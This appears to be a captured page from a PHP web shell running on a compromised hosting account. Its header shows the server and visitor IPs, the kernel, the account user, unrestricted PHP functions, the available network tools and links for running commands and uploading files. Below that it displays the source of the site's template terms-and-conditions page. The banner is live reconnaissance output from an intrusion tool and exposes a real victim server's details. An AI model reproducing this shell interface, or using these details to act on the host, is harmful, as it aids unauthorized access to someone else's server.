Server IP : 103.53.40.154 / Your IP : 3.15.228.162 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/mandmpneumatics.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Term and condition</title> <?php include 'top-link.php'; ?> </head> <body> <?php include 'header.php'; ?> <section class="page-title"> <div class="container"> <div class="row"> <div class="col col-xs-12"> <h2>Terms and Conditions</h2> <ol class="breadcrumb"> <li><a href="index-2.php">Home</a></li> <li>Terms and Condition</li> </ol> </div> </div> <!-- end row --> </div> <!-- end container --> </section> <div class="container"> <div class="row"> <div class="col-md-8 offset-md-2"> <h1 class="text-center">Terms and Conditions</h1> <h2>1. Introduction</h2> <p>Welcome to XYZ Construction Company. These terms and conditions outline the rules and regulations for the use of our website.</p> <h2>2. Intellectual Property Rights</h2> <p>Unless otherwise stated, XYZ Construction Company and/or its licensors own the intellectual property rights for all material on our website.</p> <h2>3. Restrictions</h2> <p>You are specifically restricted from all of the following:</p> <ul> <li>publishing any website material in any other media;</li> <li>selling, sublicensing, or commercializing any website material;</li> <li>publicly performing and/or showing any website material;</li> <li>using our website in any way that is or may be damaging to the website;</li> <li>engaging in any data mining, data harvesting, or similar activities;</li> <li>using our website to engage in any advertising or marketing.</li> </ul> <h2>4. No Warranties</h2> <p>This website is provided "as is," with all faults, and XYZ Construction Company makes no express or implied representations or warranties.</p> <h2>5. Limitation of Liability</h2> <p>In no event shall XYZ Construction Company be liable for any indirect, consequential, or incidental damages.</p> <h2>6. Severability</h2> <p>If any provision of these terms is found to be invalid under any applicable law, such provisions shall be deleted without affecting the remaining provisions herein.</p> <h2>7. Variation of Terms</h2> <p>XYZ Construction Company is permitted to revise these terms and conditions at any time as it sees fit, and by using this website you are expected to review these terms on a regular basis.</p> <h2>8. Governing Law & Jurisdiction</h2> <p>These terms and conditions will be governed by and construed in accordance with the laws of [Your Jurisdiction], and you submit to the non-exclusive jurisdiction of the state and federal courts located in [Your Jurisdiction] for the resolution of any disputes.</p> </div> </div> </div> <?php include 'footer.php'; ?> </body> </html>